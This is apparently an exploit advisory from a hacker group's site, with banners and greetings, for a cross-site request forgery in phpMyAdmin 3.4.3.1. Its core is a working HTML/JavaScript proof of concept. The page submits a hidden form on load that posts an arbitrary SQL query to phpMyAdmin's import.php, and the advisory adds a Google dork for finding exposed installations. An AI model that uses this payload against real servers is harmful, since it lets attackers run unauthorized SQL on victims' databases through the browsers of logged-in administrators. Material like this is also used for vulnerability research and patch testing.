===================================================================== .__ .__ __ .__ .___ ____ ___ _________ | | ____ |__|/ |_ |__| __| _/ _/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ | \ ___/ > < | |_> > |_( <_> ) || | /_____/ | / /_/ | \___ >__/\_ \| __/|____/\____/|__||__| |__\____ | \/ \/|__| \/ Exploit-ID is the Exploit Information Disclosure Web : exploit-id.com e-mail : root[at]exploit-id[dot]com ######################################### I'm Caddy-Dz, member of Exploit-Id ######################################### ====================================================================== #### # Exploit Title: PhpMyadmin XSRF Vuln (Execute SQL Query) # Author: Caddy-Dz # Facebook Page: www.facebook.com/islam.caddy # E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com # Website: www.exploit-id.com # Google Dork: inurl:/phpmyadmin/ # Category:: Webapps # Tested on: [Windows Seven Edition Intégral- French] #### # | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << | # | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 | # | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...| # | ----------------------------------------------- | # + All Dz .. This is Open Group 4 L33T Dz Hax3rZ .. #### [+] Note : Only the request executed by the root,users (Server) [+] Tested on : EasyPhp 5.4alpha2 -Apache 2.2.19 -MySQL 5.5.13 -PhpMyAdmin 3.4.3.1 -Xdebug 2.1.1 [+] Video: http://www.youtube.com/watch?v=xJH_ujBNTVY [*] ExpLo!T : <html> <head> </head> <body onload="javascript:fireForms()"> <script language="JavaScript"> function fireForms() { var count = 1; var i=0; for(i=0; i<count; i++) { document.forms[i].submit(); } } </script> <form method="post" action="http://127.0.0.1/home/mysql/import.php" enctype="multipart/form-data" class="ajax" id="sqlqueryform" name="sqlform"> <input type="hidden" name="is_js_confirmed" value="0" /> <input type="hidden" name="token" value="47cd4b47756bd497165c6fc7f87d2182" /> <<== make sure you put the right value <input type="hidden" name="pos" value="0" /> <input type="hidden" name="goto" value="server_sql.php" /> <input type="hidden" name="message_to_show" value="Votre requête SQL a été exécutée avec succès" /> <input type="hidden" name="prev_sql_query" value="" /> <textarea type="hidden" tabindex="100" name="sql_query" id="sqlquery" cols="40" rows="30" dir="ltr">Your SQL Query;</textarea> <input type="hidden" name="bkm_label" value="" /> <input type="hidden" name="bkm_all_users" value="true" /> <input type="hidden" name="bkm_replace" value="true" /> <input type="hidden" name="sql_delimiter" value=";" /> ] <input type="hidden" name="show_query" value="1" checked="checked" /> </form> #### [+] Peace From Algeria #### =================================**Algerians Hackers**=======================================| # Greets To : | KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , | All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) | All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , | RmZ ...others | ============================================================================================ |